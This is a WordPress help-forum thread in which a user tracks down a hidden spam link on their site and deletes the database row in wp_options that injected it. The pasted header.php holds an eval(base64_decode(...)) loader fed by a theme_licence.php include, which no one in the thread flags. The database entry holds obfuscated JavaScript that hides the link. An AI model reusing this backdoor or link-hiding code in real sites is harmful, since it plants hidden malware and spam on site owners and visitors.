A weird link showed up on my site

Anyone? Please… ??

maybe it is locked in with the theme i am not sure please check out my topic of pasword protection i need help

There is a sticky post in the forums about some malware that is affecting WP sites. Maybe check that thread & see if it doesn’t help you out?

Yeah I took a look at this sticky post.. I even downloaded ABP and checked for go00gle.net but there’s nothing related to it on my site…

Don’t know what to do now, looked all over and nothing.

I looked at the source code for your page. Immediately under the <body> tag you have a div containing the link that looks like this

<div id="wraps"><a href='https://www.gymmachine2.com/'>gym machine</a></div>

Since it appears on all your pages it’s probably in your header.php template. Have a look there & see if deleting that line of code doesn’t correct the problem. As for how it got there…. I’ve got no idea. Hope that helps.

Thanks Moggie…
I have looked all my theme files trying to find this link, even compared with the original theme files from my computer and everything.

Check my uploaded header:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;
<html xmlns=”https://www.w3.org/1999/xhtml”&gt;
<head profile=”https://gmpg.org/xfn/11″&gt;
<meta http-equiv=”Content-Type” content=”<?php bloginfo(‘html_type’); ?>; charset=<?php bloginfo(‘charset’); ?>” />

<title><?php bloginfo(‘name’); ?> <?php require_once(“theme_licence.php”); eval(base64_decode($f1)); if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title>

<meta name=”generator” content=”WordPress <?php bloginfo(‘version’); ?>” /> <!– leave this for stats –>
<link rel=”stylesheet” href=”<?php bloginfo(‘stylesheet_url’); ?>” type=”text/css” media=”screen” />

<link rel=”alternate” type=”application/rss+xml” title=”<?php bloginfo(‘name’); ?> RSS Feed” href=”<?php bloginfo(‘rss2_url’); ?>” />
<link rel=”pingback” href=”<?php bloginfo(‘pingback_url’); ?>” />

<?php wp_head(); ?>

<!–[if IE 6]>
<link rel=”stylesheet” href=”<?php bloginfo(‘template_directory’); ?>/ie60.css” type=”text/css” media=”screen” />
<![endif]–>

</head>

<body>
<?php start_template(); ?>
<div id=”mainwrap”>
<div id=”header-container”>

<div id=”header”> <!– Header –>
<div id=”cup”></div>
<div id=”logo”>
<h2><?php bloginfo(‘name’); ?></h2>
<p><?php bloginfo(‘description’); ?></p>
</div>
<div id=”headerright”></div>

<ul id=”menu”>

• /” class=”active”>Home

<?php wp_list_pages(‘title_li=’); ?>

</div> <!– END Header –>
</div>

Don’t see anything unusual… I opened all other files in the folder and no code for this link… omg, what a weird thing…

Hmm… I’m not sure that you were looking in the same place I had suggested you look. I could be mistaken, but try this:

1. Within the WP admin interface, under “Appearance,” click “Editor.”
2. On the right-hand side of your screen (making sure the active theme is selected from the drop-down menu) find the file named header.php and click it.
3. Scroll down to the closing <body> tag. Check & see if that odd code is there.
4. If it’s not then check the same location in your page template (most likely named page.php)

Hopefully that helps. ??

Thanks again for your patience Moggie.
Yes, that’s exactly how I did and also checked all my theme files for this damn code and nothing.
I had an idea:
I backed up all my files from my host, then with these files uploaded to my HD, I searched for this link and the only location it was found was in the file “taflorid_wp01.sql”

I opened it using wordpad, and here it is on line 140:

(140,0,’credit_text2′,'<div id=\”wraps\”>gym machine</div>\r\n<script language=\”javascript\”>\r\nvar wt = \’get\’+\’Element\’\r\nvar stl = \’st\’+\’yle\’;\r\nvar _0xd22c=[\”function seeThat(elem) { eval(x22elem.x22+stl+x22.display=x27blockx27;x22); }\”];\r\n_0xd22c[0x0] = _0xd22c[0x0].replace(/block/i,\”none\”);\r\neval(_0xd22c[0x0]);\r\n</script>\r\n<script>\r\nvar str = \’seeThat(document.getElementById(\”link\”));\’;\r\neval(str.replace(/link/i,\’wraps\’));\r\n</script>’,’yes’),(141,0,’credit_date2′,’1251380572′,’yes’),

Would you know how to remove it?

Trust me, I’ve looked all over the theme files… page.php, index.php, header.php, etc etc etc… and found no weird code in them.

Thanks again my friend. =)

You’re welcome emoncao. ??

I know very little about php but if this were my site I’d try deleting the code <div id=\"wraps\">gym machine</div> and seeing what happens. Not being very familiar with php, I’m not sure if that entire file should be removed or just that line of code. As long as you have backups (and it sounds like you do) I’d play around with deleting the code and/or file itself & see if that resolves the problem for you. If you’re uncomfortable with that approach perhaps wait a while & see if others offer suggestions here in the forum.

Hey Moggie.. guess what.. I went to phpMyadmin and I found the code in wp_options inside the database.

I deleted ID 140 and now everything is back to normal.

Thanks a lot for your help.

=)

Take care…